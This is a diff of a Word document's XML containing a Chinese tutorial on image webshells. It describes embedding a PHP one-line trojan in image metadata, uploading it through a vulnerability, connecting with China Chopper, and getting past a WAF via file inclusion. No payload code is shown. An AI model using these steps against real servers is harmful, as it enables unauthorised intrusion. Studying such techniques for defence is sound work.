+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>右键图片属性</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2326,10 +2145,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E0E85D0" wp14:editId="737490DD">
-            <wp:extent cx="4629150" cy="2114550"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3238500" cy="2971800"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="34" name="图片 34"/>
+            <wp:docPr id="31" name="图片 31"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2340,20 +2159,27 @@
                     <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill>
+                  <pic:blipFill rotWithShape="1">
                     <a:blip r:embed="rId33"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
+                    <a:srcRect b="12359"/>
+                    <a:stretch/>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4629150" cy="2114550"/>
+                      <a:ext cx="3238500" cy="2971800"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                      </a:ext>
+                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -2365,15 +2191,12 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用浏览器取访问该上传的图片</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后使用记事本打开，可以发现代码也被注入里头了</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2385,10 +2208,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38B28757" wp14:editId="1E8427AA">
-            <wp:extent cx="5274310" cy="2692400"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="33" name="图片 33"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4295775" cy="1200150"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="32" name="图片 32"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2408,7 +2231,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="2692400"/>
+                      <a:ext cx="4295775" cy="1200150"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2423,24 +2246,29 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>打开菜刀连接</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>图片马的使用</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将制作好的图片通过漏洞上传到服务器</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2448,10 +2276,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2633FE63" wp14:editId="709E7342">
-            <wp:extent cx="4248150" cy="2038350"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4629150" cy="2114550"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="35" name="图片 35"/>
+            <wp:docPr id="34" name="图片 34"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2471,7 +2299,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4248150" cy="2038350"/>
+                      <a:ext cx="4629150" cy="2114550"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2483,21 +2311,31 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使用浏览器取访问该上传的图片</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="364E9623" wp14:editId="00E4E1D3">
-            <wp:extent cx="4953000" cy="2352675"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="36" name="图片 36"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2692400"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="33" name="图片 33"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2517,6 +2355,109 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2692400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>打开菜刀连接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4248150" cy="2038350"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="35" name="图片 35"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4248150" cy="2038350"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4953000" cy="2352675"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="36" name="图片 36"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4953000" cy="2352675"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -2532,7 +2473,1581 @@
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>包含绕过</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>WAF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>如果是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>木马图片，上传上去是无法被解析出来，也就无法使用菜刀连</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>一句话木马写入图片的版权当中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3324225" cy="3838575"/>
+            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
+            <wp:docPr id="37" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3324225" cy="3838575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后把该图片马上传到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>apache</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>服务器上</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="804846"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="38" name="图片 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="804846"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使用浏览器访问该图片</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2756465"/>
+            <wp:effectExtent l="19050" t="19050" r="21590" b="24835"/>
+            <wp:docPr id="39" name="图片 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2756465"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="75000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>webshell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>连接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4333875" cy="2095500"/>
+            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
+            <wp:docPr id="40" name="图片 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4333875" cy="2095500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>结果显示返回码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>200</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，但是进不去</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>里头</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3800475" cy="1876425"/>
+            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
+            <wp:docPr id="41" name="图片 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 13"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId43"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3800475" cy="1876425"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>这是因为图片并没有被当做</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>来解析，因此没有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
